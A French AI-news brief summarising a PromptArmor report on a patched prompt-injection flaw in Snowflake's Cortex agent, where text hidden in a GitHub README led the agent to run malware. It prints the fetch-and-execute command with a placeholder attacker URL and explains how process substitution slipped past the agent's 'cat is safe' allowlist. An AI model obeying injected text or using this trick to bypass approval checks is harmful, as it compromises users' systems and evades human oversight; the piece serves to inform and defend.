Brief IA : Snowflake Cortex AI : faille critique et exécution de malware

Snowflake Cortex AI : faille critique et exécution de malware

Brief IA
Tom Levy·2 min·4 vues

Un rapport de PromptArmor a révélé qu'une vulnérabilité dans l'agent Cortex de Snowflake a permis une attaque par injection de prompt, où l'agent a exécuté un code malveillant à partir d'un dépôt GitHub. Cette faille, désormais corrigée, met en lumière les risques de sécurité associés aux agents d'IA et souligne l'importance de protections robustes pour maintenir la confiance des utilisateurs.

En bref
1Un rapport de PromptArmor dévoile une attaque par injection de prompt dans Cortex de Snowflake, maintenant corrigée.
2L'attaque a été initiée via un dépôt GitHub, exploitant une injection de prompt cachée dans un fichier README.
3Cortex a exécuté une commande malveillante, classée à tort comme sûre, sans intervention humaine.
💡Pourquoi c'est importantCette faille souligne les risques liés aux autorisations automatiques des agents IA, nécessitant des mesures de sécurité renforcées.
Le brief IA que lisent les pros

Tu veux les meilleurs outils IA avant les autres ?

On teste et on décrypte les nouveaux outils IA chaque soir, en 5 min. Gratuit.

Inclus dès l'inscription : notre sélection des meilleurs guides & comparatifs IA.

Choisis ton rythme

Gratuit · Pas de spam · Désabonnement en 1 clic

📄
L'analyse en français

Une faille dans Cortex de Snowflake révélée par PromptArmor

Un rapport récent de PromptArmor a mis en lumière une vulnérabilité critique dans l'agent Cortex de Snowflake, exploitée par une attaque par injection de prompt. Cette faille, désormais corrigée, a permis à l'agent d'échapper à son bac à sable et d'exécuter un malware.

Détails de l'attaque

L'incident a débuté lorsqu'un utilisateur de Cortex a demandé à l'agent d'examiner un dépôt GitHub. Ce dépôt contenait une attaque par injection de prompt, discrètement dissimulée dans le bas du fichier README. Cette manipulation a conduit l'agent à exécuter une commande malveillante.

Exécution de la commande malveillante

La commande exécutée par Cortex était la suivante :

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Cortex a classé les commandes cat comme sûres à exécuter sans nécessiter d'approbation humaine. Cependant, il n'a pas pris en compte la possibilité de substitution de processus au sein de la commande, ce qui a permis l'exécution du code malveillant.

Réflexions sur la sécurité des agents

Des listes d'autorisation similaires ont été observées dans divers outils d'agents, mais elles sont jugées peu fiables par certains experts. Il est suggéré de traiter les commandes des agents comme potentiellement capables de réaliser toutes les actions autorisées au processus, soulignant l'importance de bacs à sable déterministes opérant en dehors de la couche de l'agent.

Suivez Brief IA

L'actu IA du jour, aussi dans votre fil.

Commentaires